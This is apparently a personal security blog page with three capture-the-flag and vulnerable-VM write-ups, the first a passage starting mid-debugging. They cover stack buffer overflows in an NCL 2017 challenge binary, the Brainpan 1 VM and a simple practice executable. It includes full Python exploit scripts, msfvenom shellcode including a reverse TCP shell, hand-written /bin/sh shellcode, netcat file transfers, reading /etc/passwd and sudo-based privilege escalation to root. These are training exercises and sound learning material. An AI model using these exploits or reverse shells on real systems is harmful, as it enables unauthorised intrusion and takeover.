ESP: 0x86041c0 --> 0x86041c8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
EIP: 0x416b6e41 ('AnkA')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x416b6e41
[------------------------------------stack-------------------------------------]
0000| 0x86041c0 --> 0x86041c8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
0004| 0x86041c4 --> 0x0
0008| 0x86041c8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
0012| 0x86041cc ("AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%"...)
0016| 0x86041d0 ("ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%s"...)
0020| 0x86041d4 ("$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA"...)
0024| 0x86041d8 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%"...)
0028| 0x86041dc ("A-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%C"...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x416b6e41 in ?? ()
gdb-peda$ pattern_offset 0x416b6e41
1097559617 found at offset: 1132
view raw Second gdb round hosted with ❤ by GitHub
The segmentation fault is now at 0x416b6e41, Plugging that into PEDA's pattern_offset feature results in an offset of 1132 bytes before the overflow/where we can place our return address.

Now all we need to do is find a return address which we can find with a mock exploit program to see where are values are statically stored.

Mock Exploit

pad = 'A' * 1132
ret = 'BBBB'
buf = 'C' * 200
payload = pad + ret + buf
print payload
view raw mockexploit.py hosted with ❤ by GitHub
So when the program crashes with an address of BBBB (\x42424242) we can use PEDA's find feature to locate our mock shellcode of C's.

Testing our Mock Exploit

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# python mockexploit.py > inp
root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# gdb -q ./NCL-2017-Spring-InstructionsUnclear-X32
Reading symbols from ./NCL-2017-Spring-InstructionsUnclear-X32...(no debugging symbols found)...done.
gdb-peda$ r 209f50f37f89cf43e85e46e57d8624e8 < inp
Starting program: /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e8 < inp
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb ('\x0b')
EBX: 0xf7ffd000 --> 0x23f3c
ECX: 0x0
EDX: 0x0
ESI: 0xffffd340 --> 0xffffd544 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
EDI: 0x80483dc (<_start>: mov DWORD PTR ds:0x84045b0,esp)
EBP: 0x0
ESP: 0x86041c0 --> 0x86041c8 ('A' <repeats 200 times>...)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0x86041c0 --> 0x86041c8 ('A' <repeats 200 times>...)
0004| 0x86041c4 --> 0x0
0008| 0x86041c8 ('A' <repeats 200 times>...)
0012| 0x86041cc ('A' <repeats 200 times>...)
0016| 0x86041d0 ('A' <repeats 200 times>...)
0020| 0x86041d4 ('A' <repeats 200 times>...)
0024| 0x86041d8 ('A' <repeats 200 times>...)
0028| 0x86041dc ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
gdb-peda$ find CCCCCCCCCC
Searching for 'CCCCCCCCCC' in: None ranges
Found 40 results, display max 40 items:
NCL-2017-Spring-InstructionsUnclear-X32 : 0x8604638 ('C' <repeats 200 times>)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x8604642 ('C' <repeats 190 times>)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x860464c ('C' <repeats 180 times>)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x8604656 ('C' <repeats 170 times>)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x8604660 ('C' <repeats 160 times>)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x860466a ('C' <repeats 150 times>)
...
view raw gdb mock payload hosted with ❤ by GitHub
Our C's start at 0x8604638 (end of .data segment) which isn't going to change allowing us to put this address as our return address to jump directly to our shellcode without any guessing. Once we reformat this address to little endian and cut it into bytes our return address is going to be \x38\x46\x60\x08.

The entire point of this NCL challenge is to input the correct passcode to get the output of "whooooo, you got it!" so why don't we go ahead and cheat our way to that response. I'm extremely lazy so lets just generate some shellcode with msfvenom to execute the command "echo whooooo, you got it!".

I had to block the characters of \x00 (for obvious reasons), \xcb, \x0c, and \x0d as those characters will split the output into multiple lines. Our program won't read input on multiple lines so if it's split it'll only run a portion of the shellcode until it hits that split causing a segmentation fault (due to only partial execution of the shellcode).

Generating Our Shellcode

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# msfvenom -p linux/x86/exec CMD='echo whooooo, you got it!' -b 'x00xcbx0cx0d' -f python
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 88 (iteration=0)
x86/shikata_ga_nai chosen with final size 88
Payload size: 88 bytes
Final size of python file: 432 bytes
buf = ""
buf += "\xb8\xcf\x9b\x5e\x2b\xda\xc9\xd9\x74\x24\xf4\x5b\x2b"
buf += "\xc9\xb1\x10\x31\x43\x13\x83\xeb\xfc\x03\x43\xc0\x79"
buf += "\xab\x41\xd5\x25\xcd\xc4\x8f\xbd\xc0\x8b\xc6\xd9\x73"
buf += "\x63\xab\x4d\x84\x13\x64\xec\xed\x8d\xf3\x13\xbf\xb9"
buf += "\x19\xd4\x40\x3a\x78\xb7\x28\x55\xa2\x40\xc1\xc6\xcd"
buf += "\xc1\x7e\x76\x3d\x3e\xf8\xe7\x48\x1e\x9d\x98\xc6\x7e"
buf += "\x08\x13\x07\x7f\x9d\x88\xce\x9e\xec\xaf"
view raw Creating shellcode hosted with ❤ by GitHub
Now all we've got to do is put all the pieces together.

Writing Our Exploit

# Exec 'echo whooooo, you got it!' shellcode
buf = ""
buf += "\xb8\xcf\x9b\x5e\x2b\xda\xc9\xd9\x74\x24\xf4\x5b\x2b"
buf += "\xc9\xb1\x10\x31\x43\x13\x83\xeb\xfc\x03\x43\xc0\x79"
buf += "\xab\x41\xd5\x25\xcd\xc4\x8f\xbd\xc0\x8b\xc6\xd9\x73"
buf += "\x63\xab\x4d\x84\x13\x64\xec\xed\x8d\xf3\x13\xbf\xb9"
buf += "\x19\xd4\x40\x3a\x78\xb7\x28\x55\xa2\x40\xc1\xc6\xcd"
buf += "\xc1\x7e\x76\x3d\x3e\xf8\xe7\x48\x1e\x9d\x98\xc6\x7e"
buf += "\x08\x13\x07\x7f\x9d\x88\xce\x9e\xec\xaf"
# 1132 bytes to get to return address
pad = 'A' * 1132
# Jump to the shellcode at 0x8604638 (.bss/data segment)
ret = '\x38\x46\x60\x08'
# NOP sled to get to our shellcode (Not needed, just a good habit unless you have a limited buffer space)
sled = '\x90' * 20
payload = pad + ret + sled + buf
print payload
view raw exploit.py hosted with ❤ by GitHub
Now lets run our exploit to get our "well deserved" message.

"Winning"

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# python exploit.py | ./NCL-2017-Spring-InstructionsUnclear-X32 1
I guess, uh... type in a passcode: whooooo, you got it!
root@ggrins:~/Documents/NCL/Instructions Unclear Writeup#
view raw winning hosted with ❤ by GitHub
So NCL, my question is, do you accept an answer of.. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x38\x46\x60\x08\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xcf\x9b\x5e\x2b\xda\xc9\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1\x10\x31\x43\x13\x83\xeb\xfc\x03\x43\xc0\x79\xab\x41\xd5\x25\xcd\xc4\x8f\xbd\xc0\x8b\xc6\xd9\x73\x63\xab\x4d\x84\x13\x64\xec\xed\x8d\xf3\x13\xbf\xb9\x19\xd4\x40\x3a\x78\xb7\x28\x55\xa2\x40\xc1\xc6\xcd\xc1\x7e\x76\x3d\x3e\xf8\xe7\x48\x1e\x9d\x98\xc6\x7e\x08\x13\x07\x7f\x9d\x88\xce\x9e\xec\xaf?

No? Oh, well it was fun anyways!
Posted by at No comments:

Thursday, June 8, 2017

Brainpan 1 Writeup

Brainpan 1 is an intermediate level vulnerable VM, your only goal is to obtain root on said machine.

 Lets jump right into this with an aggressive TCP connect scan with:
nmap -sT -A -oX brainpan.xml 192.168.1.141
Outputting to brainpan.xml for my own notekeeping in Dradis.

Basic enough, only 2 ports open:
- 10000/tcp http SimpleHTTPServer 0.6 (Python 2.7.3)
- 9999/tcp abyss

But we also learned it's probably Linux with a kernel version between 2.6.32 - 3.10

Lets run dirbuster, a website directory bruteforcer to see what's on the website:
dirb http://192.168.1.141:10000
 

The index page was rather boring, however, within the bin folder contained a file called "brainpan.exe"

  
We'll hold on to that for later, right now lets take a look at that abyss port. We'll try to banner grab the port with: 
nc 192.168.1.141 9999 
 
Which returns this page that's asking for a password (entering password for the password returned ACCESS DENIED, who would have thought?).

 This isn't actually a login page as entering the password shitstorm results in ACCESS GRANTED being printed with the connection then being closed.

 Lets take a look at that brainpan.exe file we got from the website in Ollydbg, the x86 debugger for all things Windows.

Well we can see here clearly that this executable is the same program used on port 9999.

 Interesting, an executable with user input? Seems like the perfect opportunity to exploit a Buffer Overflow, lets test out our theory with some fuzzing.

 First we'll grab a fuzzing pattern with metasploit's pattern_create program. We're doing this to remove that game of higher or lower to find the perfect offset needed for the overflow. 


Now lets chuck this at that executable with a script and watch the output in Ollydbg.
 
python exploit.py 192.168.1.111 9999

 And to nobodies surprise, it crashed brainpan.exe.

From looking at Ollydbg we can see that the program crashed with an EIP (Extended Instruction Pointer) of 0x35724134.

 Lets punch that EIP value into metasploits pattern_offset program to find out the offset needed for the buffer overflow.

Awesome, only 524 A's for this buffer overflow! Before we make our shellcode we need to find a place to point (return address) to that will allow our shellcode to actually be executed.

 To make things short and sweet, one way to execute shellcode is to point at a JMP ESP instruction.

 How convenient is it that a function called winkwink has a JMP ESP instruction?????

Instead of manually searching for the instructions you can also search for the opcode of the instruction you want to find, JMP ESP is ff e4:
objdump -d brainpan.exe | grep "ff e4"

Which shows the same location of 0x311712f3.

Before you can use it as the pointer for your overflow you need to change it to little endian (0xf3121731) and separate into bytes giving us \xF3\x12\x17\x31.

 Let's create some shellcode with msfvenom.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.111 LPORT=5555 -b "x00" -e x86/shikata_ga_nai -f python

 Or in better terms:
Payload -> linux/x86/shell_reverse_tcp
Local Host -> 192.168.1.111 (Me)
Local Port -> 5555 (Port I'll be listening to)
Bytes I don't want in my shellcode -> 0x00
Encoder -> x86/shikata_ga_nai
Format -> Python

 I'm creating the shellcode without 0x00 bytes as they tend to always make your shellcode not work. always.

 
Awesome, we can just plop that python formatted shellcode right into our script.
 
Cool so now we've got 524 A's to set us up for the overflow, our pointer that will jump us to that JMP ESP instruction, 50 NOP (0x90) instructions to act as a NOP sled to give some wiggle room for allowing our shellcode to execute, and our shellcode that'll give us a reverse tcp shell on the host.

 Now all we have to do is execute our program with..
python exploit.py 192.168.1.141 9999
while listening for a response with..
nc -lvp 5555

Success! We've popped a half shell as user puck!

Let's get out of this /bin/sh and into /bin/bash with
python -c 'import pty;pty.spawn("/bin/bash")'

 Now to spare the expense of all of the boring post exploitation searching for something important, here is a breakdown of the interesting things.

cat /etc/passwd
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash

groups reynard && groups anansi && groups puck
reynard : reynard adm cdrom sudo dip plugdev lpadmin sambashare
anansi : anansi
puck : puck

 BORING. Lets look at the sudo commands we can enter


Interesting, we'll save that for later. How about if there are any interesting SUID (Set owner User ID up on execution) files??

Even more interesting, that /usr/local/bin/validate file looks really out of place. Oh, it's actually an executable with input owned by anansi? Smells like another buffer overflow but lets take a closer look at it offsite using netcat to transfer the files on and off.
root@ggrins# nc -lvp 4444 > validate

 puck@brainpan:/usr/local/bin$ nc -q 0 192.168.1.111 4444 < validate 

 Lets run it through gdb with that metasploit created pattern and see if it crashes.

 gdb --args ./validate Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9...


Wow who would have expected?? It crashed! We can also see that it crashed with an EIP of 0x39644138 (or do info registers if you don't trust me, I don't care)


Again, we'll just put that into metasploit's pattern_offset program

Only 116 A's needed this time.

 Next on the menu is finding another place to point to, unfortunately for us this program does not have any JMP ESP instructions..

We do have CALL EAX (opcode ff d0) instructions and those work just as well as JMP ESP!

Now we have 2 places we can point to, but we'll just choose the first one at 0x80484af.
Again putting it into little endian (0xaf840408) and cutting it into bytes 
(\xaf\x84\x04\x08)

Now we just need our shellcode, since all we're trying to do is escalate to the owner of the file (anansi) we just need to spawn a basic /bin/sh shell. We can do that by first writing the assembly that will spawn our shell.

shellcode.asm

Remember, stacks are LIFO (Last In First Out), meaning, when we push //sh first and then push /bin after it will look like /bin//sh in the stack.     

Now lets compile our assembly with nasm..
nasm -f elf shellcode.asm -o shellcode.o

we can take a look at the hex needed for our shellcode with..
objdump -d shellcode.o

Instead of manually typing and formatting all of the hex (\x31\xc0 etc etc) I found this insane command that will do it for you here.

objdump -d shellcode.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Which gives us our properly formatted shellcode of..
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

Let's put all of this together in a nice python script..
 
Now all we need to do is move it back onto the target machine with netcat and run it.

 puck@brainpan:/home/puck$ nc -lvp 4444 > exploit.py

root@ggrins:~/Desktop/Brainpan/Post Exploit# nc 192.168.1.141 4444 < exploit.py

I moved it into the user's home directory considering this is a mock scenario and I really don't care, but in a real scenario you should probably put the file in /tmp or somewhere else.

 Now to run it all we have to do is enter..
./validate $(python /home/puck/exploit.py)

Sweet, we are now anansi! 

..and then I got stuck. I couldn't figure out how to get root from anansi. Turns out it relies on that anansi_util file that puck can sudo to in /home/anansi/bin/

This anansi_util program runs commands directly from the shell, it default allows for you to chose from "network" (ifconfig), "proclist" (top), and "manual" (man).

 As anansi you are allowed to edit this file, which you can then add /bin/bash to it with..
$ /bin/bash > anansi_util

allowing anyone to run anansi_util and generate a bash shell. With the program being allowed to run with sudo it doesn't just generate any normal shell, it generates a ROOT shell.

So yep, a rather disappointing ending to a challenging VM. But hey, we learned along the way so who cares.
Posted by at No comments:

Sunday, May 29, 2016

Buffer Overflow Challenge

This challenge consisted of a single 32-bit executable in which you had to exploit a buffer overflow and call the function being asked within the program. The only tools used to complete this challenge was gdb, the linux CLI debugger.

Hopping into gdb the first thing I wanted to test was its breaking point, testing with an initial input of 300 A's done with a simple python script in gdb.
 This results in a segmentation fault within the program caused by 0x41414141 (The program crashed due to the overflow of A's).

To get a better view of the program in action we need to set some break points, to find the best break points we can analyze the assembler code for the programs main function.
I decided to put breaks at the start of the main function, at all of the print calls, and at the end of the main function. So in gdb we need to put breaks at main, *main+23, *main+40, *main+85, and *main+96.
From this we can see two things:
  • Breakpoint 3, or *main+40, prints the string "Call me twice" which we can assume will be the point we will need to call later on.
  • Breakpoint 4, or *main+85, prints "Buffer overflows are easy" + our input string and it also displays the point in which the program becomes completely overrun by the buffer overflow.
Now that we know the points of corruption within the program caused by the buffer overflow we can analyze the stack pointer register (esp) at each breakpoint to assess the damage of the overflow throughout the program.

We will be analyzing the first 100 memory addresses of our stack point of breakpoints 3, 4, and 5.
  
Breakpoint 3 (python -c 'print "A" * 300')

Breakpoint 4 (python -c 'print "A" * 300')

Breakpoint 5 (python -c 'print "A" * 300')
 

To actually inject code through a buffer overflow attack we're going to need to find the lowest point of overflow. This was ultimately done like a game of higher and lower until I found the sweet spot of 112 A's. Why 112 you ask? Good question, that's due to the way gcc, the gnu C compiler, compiles code allowing it to store a bit more buffer memory than specified (in this case 12).

The green highlighting equates to the saved frame pointer on the stack, cyan represents the functions return address, pink represents the functions' arguments, and red represents the next breakpoints saved frame pointer, return address, and arguments.

Breakpoint 3 (python -c 'print "A" * 112')

Breakpoint 4 (python -c 'print "A" * 112')

Breakpoint 5 (python -c 'print "A" * 112')
   
We can see from breakpoint 4 that if we entered 4 more A's the program would have a new saved frame pointer of 0x41414141 instead of it's usual 0x7ddca00.

Now that we know it requires 112 bytes to get into the function's return saved pointer frame all we need to do is create a payload that reroutes the program to a previous method call (The one that asked to be called twice).

inspecting the disassembled main function shows a call for the function print_msg located at 0x80484e5 (the memory location of the method call we need to re-execute).

  
This memory location (0x80484e5) allows us to create a new stack pointer to redirect the program to the print_msg method call during our buffer overflow attack. Great! Now that we have our location, all we need to do is plop it onto the end of our A's right? Well, not exactly. To allow the program to read it we first need to split 0x80484e5 into groups of 2 hex digits. We then need to reverse the hex digits due to the initial memory location being of a different endianness than what we can set as our stack pointer.

With the memory location reversed we can now tack it onto our 112 A stack to create the input string of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA\xE5\x84\x04\x08.

Now for the hex in our string to be read as hex values we need to encase our string in some form of bash command that allows hex to be properly read. In this case we have 2 bash options: echo and printf and 2 enclosure methods: $() notation and backticks resulting in 4 different methods that result in the same answer.

`printf "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA\xE5\x84\x04\x08"`

$(printf "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA\xE5\x84\x04\x08")

`echo - e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA\xE5\x84\x04\x08"`

$(echo -e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA\xE5\x84\x04\x08")

 
Finally giving us our well deserved victory message.






Posted by at No comments:
Subscribe to: Posts (Atom)